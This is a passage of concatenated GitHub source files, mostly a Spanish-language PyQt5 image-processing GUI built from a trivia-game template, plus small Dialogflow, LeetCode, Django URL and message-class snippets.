plt.show()\n\nmain()\n","repo_name":"phlindg/MinRob","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40555655066","text":"import logging\nfrom typing import Dict\n\nfrom google.api_core import operations_v1, grpc_helpers\n\nfrom dfcx_scrapi.core import scrapi_base\n\n# logging config\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\nclass Operations(scrapi_base.ScrapiBase):\n \"\"\"Core class for Operations functions, primarily used to\n extract LRO information on long running jobs for CX.\n \"\"\"\n\n def __init__(\n self,\n creds_path: str = None,\n creds_dict: Dict = None,\n creds=None,\n scope=False\n ):\n super().__init__(\n creds_path=creds_path,\n creds_dict=creds_dict,\n creds=creds,\n scope=scope\n )\n\n @scrapi_base.api_call_counter_decorator\n def get_lro(self, lro: str):\n \"\"\"Used to retrieve the status of LROs for Dialogflow CX.\n\n Args:\n lro: The Long Running Operation(LRO) ID in the following format\n 'projects//locations//operations/\n '\n\n Returns:\n Response status and payload from LRO\n \"\"\"\n location = lro.split(\"/\")[3]\n if location != \"global\":\n host = f\"{location}-dialogflow.googleapis.com\"\n else:\n host = \"dialogflow.googleapis.com\"\n\n channel = grpc_helpers.create_channel(\n host,\n credentials=self.creds\n )\n client = operations_v1.OperationsClient(channel)\n response = client.get_operation(lro)\n\n return response\n","repo_name":"GoogleCloudPlatform/dfcx-scrapi","sub_path":"src/dfcx_scrapi/core/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"70"}
+{"seq_id":"71911241508","text":"#[COMPLETED]\r\n\r\ndigit_map = {\r\n \"0\": \"0\", \"1\":\"1\", \"8\":\"8\",\r\n \"2\":\"5\", \"5\":\"2\", \"6\":\"9\", \"9\":\"6\",\r\n}\r\n\r\ndef rotate(num: int):\r\n rot = \"\"\r\n for c in str(num):\r\n if c not in digit_map:\r\n return -1\r\n rot += digit_map[c]\r\n return int(rot)\r\n\r\ndef is_good(num: int):\r\n rotated = rotate(num)\r\n if rotated == -1:\r\n return False\r\n return rotated != num\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.memo = [-1] * 10001\r\n total = 0\r\n for n in range(0, 10001):\r\n if is_good(n):\r\n total += 1\r\n self.memo[n] = total\r\n\r\n def rotatedDigits(self, N: int) -> int:\r\n if not 1 <= N <= 10000:\r\n return -1\r\n return self.memo[N]\r\n\r\n\r\nfor i in range(100):\r\n print(str(i), \"\\t\", str(rotate(i)))\r\n","repo_name":"calvincramer/coding-challenges","sub_path":"leet-code/src/problems/p0788/python/p788.py","file_name":"p788.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"41196343200","text":"from django.urls import path\nfrom .views import GetPaymentTotalView,CreatePaymentIntentView,StripeWebhookView\n\napp_name=\"payment\"\n\nurlpatterns = [\n path('get-payment-total', GetPaymentTotalView.as_view()),\n path('create-payment-intent', CreatePaymentIntentView.as_view()),\n path('stripe-webhook', StripeWebhookView, name='stripe-webhook'),\n]","repo_name":"annderson8/break-app-backend","sub_path":"apps/payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5776782181","text":"# select_message.py\n\n\nclass SelectMessage:\n def __init__(self, text, color=None,\n font_size=None,\n time_sec=None,\n msg=None):\n \"\"\" Setup select message\n \"\"\"\n self.text = text\n self.msg = msg\n if color is None:\n color = \"dark gray\"\n self.color = color\n self.font_size = font_size\n self.time_sec = time_sec\n self.end_time = None # time to end if another\n \n def __str__(self):\n \"\"\" Informative string\n \"\"\"\n st = self.text + \" \" + self.color\n if self.time_sec is not None:\n st += \" %.2f sec\" % self.time_sec\n return st\n\n def destroy(self):\n if self.msg is not None:\n self.msg.destroy()\n self.msg = None\n ","repo_name":"raysmith619/imageSelect","sub_path":"src/select_message.py","file_name":"select_message.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"28019660652","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 1 22:59:20 2022\r\n\r\n@author: MarthaHT\r\n\"\"\"\r\n\r\nfrom PyQt5.QtWidgets import QGridLayout, QLabel, QPushButton\r\nfrom PyQt5.QtGui import QPixmap, QCursor\r\nfrom PyQt5 import QtCore\r\nfrom urllib.request import urlopen\r\nimport json\r\nimport pandas as pd\r\nimport random\r\n\r\nfrom PyQt5 import QtWidgets, uic, QtGui, QtCore\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtGui import QImage\r\nimport cv2\r\nimport time\r\nfrom PIL import ImageQt\r\nfrom PIL import Image, ImageDraw\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom ec import ec\r\nfrom un import un\r\n\r\n#open api link to database\r\nwith urlopen(\"https://opentdb.com/api.php?amount=50&category=18&difficulty=medium&type=multiple\") as webpage:\r\n #read JSON file & extract data\r\n data = json.loads(webpage.read().decode())\r\n df = pd.DataFrame(data[\"results\"])\r\n\r\n#load 1 instance of questions & answers at a time from the database\r\ndef preload_data(idx):\r\n #idx parm: selected randomly time and again at function call\r\n question = df[\"question\"][idx]\r\n correct = df[\"correct_answer\"][idx]\r\n wrong = df[\"incorrect_answers\"][idx]\r\n\r\n #fixing charecters with bad formatting\r\n formatting = [\r\n (\"#039;\", \"'\"),\r\n (\"&'\", \"'\"),\r\n (\""\", '\"'),\r\n (\"<\", \"<\"),\r\n (\">\", \">\")\r\n ]\r\n\r\n #replace bad charecters in strings\r\n for tuple in formatting:\r\n question = question.replace(tuple[0], tuple[1])\r\n correct = correct.replace(tuple[0], tuple[1])\r\n #replace bad charecters in lists\r\n for tuple in formatting:\r\n wrong = [char.replace(tuple[0], tuple[1]) for char in wrong]\r\n\r\n #store local values globally\r\n parameters[\"question\"].append(question)\r\n parameters[\"correct\"].append(correct)\r\n\r\n all_answers = wrong + [correct]\r\n random.shuffle(all_answers)\r\n\r\n parameters[\"answer1\"].append(all_answers[0])\r\n parameters[\"answer2\"].append(all_answers[1])\r\n parameters[\"answer3\"].append(all_answers[2])\r\n parameters[\"answer4\"].append(all_answers[3])\r\n\r\n\r\n\r\n#dictionary to store local pre-load parameters on a global level\r\nparameters = {\r\n \"question\": [],\r\n \"answer1\": [],\r\n \"answer2\": [],\r\n \"answer3\": [],\r\n \"answer4\": [],\r\n \"correct\": [],\r\n \"score\": [],\r\n \"index\": []\r\n }\r\n\r\n#global dictionary of dynamically changing widgets\r\nwidgets = {\r\n \"logo\": [],\r\n \"orig\": [],\r\n \"button\": [],\r\n \"score\": [],\r\n \"question\": [],\r\n \"question2\": [],\r\n \"button1\": [],\r\n \"opcion1\": [],\r\n \"opcion2\": [],\r\n \"opcion3\": [],\r\n \"opcion4\": [],\r\n \"opcion5\": [],\r\n \"opcion6\": [],\r\n \"answer1\": [],\r\n \"answer2\": [],\r\n \"answer3\": [],\r\n \"answer4\": [],\r\n \"message\": [],\r\n \"message2\": []\r\n}\r\n\r\n#initialliza grid layout\r\ngrid = QGridLayout()\r\n\r\ndef clear_widgets():\r\n ''' hide all existing widgets and erase\r\n them from the global dictionary'''\r\n for widget in widgets:\r\n if widgets[widget] != []:\r\n widgets[widget][-1].hide()\r\n for i in range(0, len(widgets[widget])):\r\n widgets[widget].pop()\r\n\r\ndef clear_parameters():\r\n #clear the global dictionary of parameters\r\n for parm in parameters:\r\n if parameters[parm] != []:\r\n for i in range(0, len(parameters[parm])):\r\n parameters[parm].pop()\r\n #populate with initial index & score values\r\n parameters[\"index\"].append(random.randint(0,49))\r\n parameters[\"score\"].append(0)\r\n\r\ndef start_game():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frame21()\r\n \r\ndef siguiente():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frame31()\r\n\r\ndef opcion1():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop1()\r\n\r\ndef opcion2():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop2()\r\n\r\ndef opcion3():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop3()\r\n\r\ndef opcion4():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop4()\r\n\r\ndef opcion5():\r\n #start the game, reset all widgets and parameters\r\n clear_widgets()\r\n clear_parameters()\r\n preload_data(parameters[\"index\"][-1])\r\n #display the game frame\r\n frameop5()\r\n\r\ndef create_buttons(answer, l_margin, r_margin):\r\n #create identical buttons with custom left & right margins\r\n button = QPushButton(answer)\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setFixedWidth(485)\r\n button.setStyleSheet(\r\n #setting variable margins\r\n \"*{margin-left: \" + str(l_margin) +\"px;\"+\r\n \"margin-right: \" + str(r_margin) +\"px;\"+\r\n '''\r\n border: 4px solid '#BC006C';\r\n color: white;\r\n font-family: 'shanti';\r\n font-size: 16px;\r\n border-radius: 25px;\r\n padding: 15px 0;\r\n margin-top: 20px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n button.clicked.connect()\r\n return button\r\n\r\ndef is_correct(btn):\r\n #a function to evaluate wether user answer is correct\r\n if btn.text() == parameters[\"correct\"][-1]:\r\n # CORRECT ANSWER\r\n\r\n #update score (+10 points)\r\n temp_score = parameters[\"score\"][-1]\r\n parameters[\"score\"].pop()\r\n parameters[\"score\"].append(temp_score + 10)\r\n\r\n #select a new random index and replace the old one\r\n parameters[\"index\"].pop()\r\n parameters[\"index\"].append(random.randint(0,49))\r\n #preload data for new index value\r\n preload_data(parameters[\"index\"][-1])\r\n\r\n #update the text of all widgets with new data\r\n widgets[\"score\"][-1].setText(str(parameters[\"score\"][-1]))\r\n widgets[\"question\"][0].setText(parameters[\"question\"][-1])\r\n widgets[\"answer1\"][0].setText(parameters[\"answer1\"][-1])\r\n widgets[\"answer2\"][0].setText(parameters[\"answer2\"][-1])\r\n widgets[\"answer3\"][0].setText(parameters[\"answer3\"][-1])\r\n widgets[\"answer4\"][0].setText(parameters[\"answer4\"][-1])\r\n\r\n if parameters[\"score\"][-1] == 100:\r\n # WON THE GAME\r\n clear_widgets()\r\n frame3()\r\n else:\r\n # WRONG ANSWER - LOST GAME\r\n clear_widgets()\r\n frame4()\r\n\r\n#*********************************************\r\n# FRAME 1\r\n#*********************************************\r\n\r\ndef frame1():\r\n clear_widgets()\r\n #logo widget\r\n image = QPixmap(\"logo.png\")\r\n logo = QLabel()\r\n logo.setPixmap(image)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 100px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #button widget\r\n button = QPushButton(\"Comienza a crear\")\r\n button.resize(400,400)\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 0;\r\n margin: 100px 200px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n button.clicked.connect(start_game)\r\n widgets[\"button\"].append(button)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"logo\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"button\"][-1], 1, 0, 1, 2)\r\n\r\n#*********************************************\r\n# FRAME 2_1\r\n#*********************************************\r\ndef cargarImagen():\r\n global filename\r\n filename = QFileDialog.getOpenFileName(filter=\"Image (*.*)\")[0]\r\n return filename\r\n\r\n\r\ndef frame21():\r\n \r\n \r\n clear_widgets()\r\n #question widget\r\n question = QLabel(\"Selecciona la imagen que te gustaría procesar\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n \r\n #button widget\r\n button = QPushButton(\"Siguiente\")\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.setGeometry(500, 150, 100, 40)\r\n button.adjustSize()\r\n button.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"button\"].append(button)\r\n\r\n #button widget\r\n button1 = QPushButton(\"Siguiente\")\r\n button1.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n \r\n button1.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n \r\n #button callback \r\n button.clicked.connect(siguiente) \r\n filename=str(cargarImagen())\r\n widgets[\"button\"].append(button)\r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 1px; margin-bottom: 1px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 0, 1, 2)\r\n grid.addWidget(widgets[\"button\"][-1], 2, 0,1,2)\r\n \r\n\r\n#*********************************************\r\n# FRAME 31\r\n#*********************************************\r\n\r\ndef frame31():\r\n\r\n #question widget\r\n question = QLabel(\"Selecciona el tipo de procesamiento que quieres realizar:\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n \r\n #button widget\r\n Bopcion1 = QPushButton(\"Ecualización\")\r\n Bopcion1.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion1.setGeometry(500, 150, 100, 40)\r\n Bopcion1.adjustSize()\r\n Bopcion1.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 70px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion1\"].append(Bopcion1)\r\n \r\n #button widget\r\n Bopcion2 = QPushButton(\"Unsharped\")\r\n Bopcion2.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion2.setGeometry(500, 150, 100, 40)\r\n Bopcion2.adjustSize()\r\n Bopcion2.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion2\"].append(Bopcion2)\r\n \r\n #button widget\r\n Bopcion3 = QPushButton(\"Filtro Difuso\")\r\n Bopcion3.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion3.setGeometry(500, 150, 100, 40)\r\n Bopcion3.adjustSize()\r\n Bopcion3.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion3\"].append(Bopcion3)\r\n \r\n #button widget\r\n Bopcion4 = QPushButton(\"EMBH\")\r\n Bopcion4.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion4.setGeometry(500, 150, 100, 40)\r\n Bopcion4.adjustSize()\r\n Bopcion4.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 10px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion4\"].append(Bopcion4)\r\n \r\n #button widget\r\n Bopcion5 = QPushButton(\"Combinar con arte\")\r\n Bopcion5.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion5.setGeometry(500, 150, 100, 40)\r\n Bopcion5.adjustSize()\r\n Bopcion5.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion5\"].append(Bopcion5)\r\n \r\n #button widget\r\n Bopcion6 = QPushButton(\"Escucha a Jupiter\")\r\n Bopcion6.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n Bopcion6.setGeometry(500, 150, 100, 40)\r\n Bopcion6.adjustSize()\r\n Bopcion6.setStyleSheet(\r\n '''\r\n *{\r\n border: 4px solid '#BC006C';\r\n border-radius: 45px;\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 25px 25px;\r\n margin: 10px 50px;\r\n }\r\n *:hover{\r\n background: '#BC006C';\r\n }\r\n '''\r\n )\r\n #button callback\r\n widgets[\"opcion6\"].append(Bopcion6)\r\n \r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n grid.addWidget(widgets[\"opcion1\"][-1], 1, 0) \r\n grid.addWidget(widgets[\"opcion2\"][-1], 1, 1) \r\n grid.addWidget(widgets[\"opcion3\"][-1], 2, 0) \r\n grid.addWidget(widgets[\"opcion4\"][-1], 2, 1)\r\n grid.addWidget(widgets[\"opcion5\"][-1], 3, 0) \r\n grid.addWidget(widgets[\"opcion6\"][-1], 3, 1)\r\n \r\n Bopcion1.clicked.connect(opcion1) \r\n Bopcion2.clicked.connect(opcion2) \r\n Bopcion3.clicked.connect(opcion3) \r\n Bopcion4.clicked.connect(opcion4) \r\n Bopcion5.clicked.connect(opcion5) \r\n\r\n#*********************************************\r\n# OPCION 1\r\n#*********************************************\r\n\r\ndef frameop1():\r\n\r\n #question widget\r\n question = QLabel(\"Ecualización de histograma\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n salida = ec(filename)\r\n '''\r\n salida = ec(filename)\r\n qimage = ImageQt.ImageQt(salida).copy()\r\n pixmap = QtGui.QPixmap.fromImage(qimage)\r\n label = QtWidgets.QLabel()\r\n label.setPixmap(pixmap)\r\n '''\r\n '''\r\n Ah = salida.shape[0]\r\n w = salida.shape[1]\r\n ch = 3\r\n bytesPerLine = ch * w\r\n qImg = QImage(rgb_array.data, w, h, bytesPerLine, QImage.Format_RGB888)\r\n ''' \r\n \r\n question2 = QLabel(\"Es un procesamiento que con base en el histograma de una imagen, \\n realiza una transformación de los datos para \\n obtener una representación de valores uniformes\")\r\n question2.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question2.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 15px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question2\"].append(question2)\r\n salida = ec(filename)\r\n \r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo2 = QLabel()\r\n logo2.setPixmap(image2)\r\n logo2.setAlignment(QtCore.Qt.AlignCenter)\r\n logo2.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"orig\"].append(logo2)\r\n \r\n #logo widget\r\n image = QPixmap(\"ec.jpg\")\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0)\r\n grid.addWidget(widgets[\"question2\"][-1], 0, 1)\r\n grid.addWidget(widgets[\"orig\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 1)\r\n\r\n#*********************************************\r\n# OPCION 2\r\n#*********************************************\r\n\r\ndef frameop2():\r\n\r\n #question widget\r\n question = QLabel(\"Unsharped\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n \r\n question2 = QLabel(\"Es un filtro que sirve para la mejora \\n de nitidez en imagenes\")\r\n question2.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question2.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 15px;\r\n color: 'white';\r\n padding: 1px;\r\n '''\r\n )\r\n widgets[\"question2\"].append(question2)\r\n salida = ec(filename)\r\n \r\n widgets[\"question\"].append(question)\r\n salida = un(filename)\r\n '''\r\n salida = ec(filename)\r\n qimage = ImageQt.ImageQt(salida).copy()\r\n pixmap = QtGui.QPixmap.fromImage(qimage)\r\n label = QtWidgets.QLabel()\r\n label.setPixmap(pixmap)\r\n '''\r\n '''\r\n Ah = salida.shape[0]\r\n w = salida.shape[1]\r\n ch = 3\r\n bytesPerLine = ch * w\r\n qImg = QImage(rgb_array.data, w, h, bytesPerLine, QImage.Format_RGB888)\r\n ''' \r\n #logo widget\r\n image = QPixmap(filename)\r\n image2 = image.scaledToWidth(500)\r\n logo2 = QLabel()\r\n logo2.setPixmap(image2)\r\n logo2.setAlignment(QtCore.Qt.AlignCenter)\r\n logo2.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"orig\"].append(logo2)\r\n \r\n #logo widget\r\n image = QPixmap(\"un.jpg\")\r\n image2 = image.scaledToWidth(500)\r\n logo = QLabel()\r\n logo.setPixmap(image2)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 10px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0)\r\n grid.addWidget(widgets[\"question2\"][-1], 0, 1)\r\n grid.addWidget(widgets[\"orig\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"logo\"][-1], 1, 1)\r\n\r\n#*********************************************\r\n# OPCION 3\r\n#*********************************************\r\n\r\ndef frameop3():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion3\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n \r\n#*********************************************\r\n# OPCION 4\r\n#*********************************************\r\n\r\ndef frameop4():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion4\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n\r\n#*********************************************\r\n# OPCION 5\r\n#*********************************************\r\n\r\ndef frameop5():\r\n\r\n #question widget\r\n question = QLabel(\"Opcion5\")\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 10px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #place global widgets on the grid\r\n grid.addWidget(widgets[\"question\"][-1], 0, 0, 1, 2)\r\n \r\n \r\n#*********************************************\r\n# FRAME 2\r\n#*********************************************\r\n\r\ndef frame2():\r\n #score widget\r\n score = QLabel(str(parameters[\"score\"][-1]))\r\n score.setAlignment(QtCore.Qt.AlignRight)\r\n score.setStyleSheet(\r\n '''\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 15px 10px;\r\n margin: 20px 200px;\r\n background: '#64A314';\r\n border: 1px solid '#64A314';\r\n border-radius: 35px;\r\n '''\r\n )\r\n widgets[\"score\"].append(score)\r\n\r\n #question widget\r\n question = QLabel(parameters[\"question\"][-1])\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 75px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #answer button widgets\r\n button1 = create_buttons(parameters[\"answer1\"][-1], 85, 5)\r\n button2 = create_buttons(parameters[\"answer2\"][-1], 5, 85)\r\n button3 = create_buttons(parameters[\"answer3\"][-1], 85, 5)\r\n button4 = create_buttons(parameters[\"answer4\"][-1], 5, 85)\r\n\r\n widgets[\"answer1\"].append(button1)\r\n widgets[\"answer2\"].append(button2)\r\n widgets[\"answer3\"].append(button3)\r\n widgets[\"answer4\"].append(button4)\r\n\r\n #logo widget\r\n image = QPixmap(\"logo_bottom.png\")\r\n logo = QLabel()\r\n logo.setPixmap(image)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\"margin-top: 75px; margin-bottom: 30px;\")\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place widget on the grid\r\n grid.addWidget(widgets[\"score\"][-1], 0, 1)\r\n grid.addWidget(widgets[\"question\"][-1], 1, 0, 1, 2)\r\n grid.addWidget(widgets[\"answer1\"][-1], 2, 0)\r\n grid.addWidget(widgets[\"answer2\"][-1], 2, 1)\r\n grid.addWidget(widgets[\"answer3\"][-1], 3, 0)\r\n grid.addWidget(widgets[\"answer4\"][-1], 3, 1)\r\n grid.addWidget(widgets[\"logo\"][-1], 4, 0, 1,2)\r\n \r\n\r\n#*********************************************\r\n# FRAME 3 - WIN GAME\r\n#*********************************************\r\n\r\ndef frame3():\r\n #congradulations widget\r\n message = QLabel(\"Congradulations! You\\nare a true programmer!\\n your score is:\")\r\n message.setAlignment(QtCore.Qt.AlignRight)\r\n message.setStyleSheet(\r\n \"font-family: 'Shanti'; font-size: 25px; color: 'white'; margin: 100px 0px;\"\r\n )\r\n widgets[\"message\"].append(message)\r\n\r\n #score widget\r\n score = QLabel(\"100\")\r\n score.setStyleSheet(\"font-size: 100px; color: #8FC740; margin: 0 75px 0px 75px;\")\r\n widgets[\"score\"].append(score)\r\n\r\n #go back to work widget\r\n message2 = QLabel(\"OK. Now go back to WORK.\")\r\n message2.setAlignment(QtCore.Qt.AlignCenter)\r\n message2.setStyleSheet(\r\n \"font-family: 'Shanti'; font-size: 30px; color: 'white'; margin-top:0px; margin-bottom:75px;\"\r\n )\r\n widgets[\"message2\"].append(message2)\r\n\r\n #button widget\r\n button = QPushButton('TRY AGAIN')\r\n button.setStyleSheet(\r\n \"*{background:'#BC006C'; padding:25px 0px; border: 1px solid '#BC006C'; color: 'white'; font-family: 'Arial'; font-size: 25px; border-radius: 40px; margin: 10px 300px;} *:hover{background:'#ff1b9e';}\"\r\n )\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.clicked.connect(frame1)\r\n\r\n widgets[\"button\"].append(button)\r\n\r\n #logo widget\r\n pixmap = QPixmap('logo_bottom.png')\r\n logo = QLabel()\r\n logo.setPixmap(pixmap)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\r\n \"padding :10px; margin-top:75px; margin-bottom: 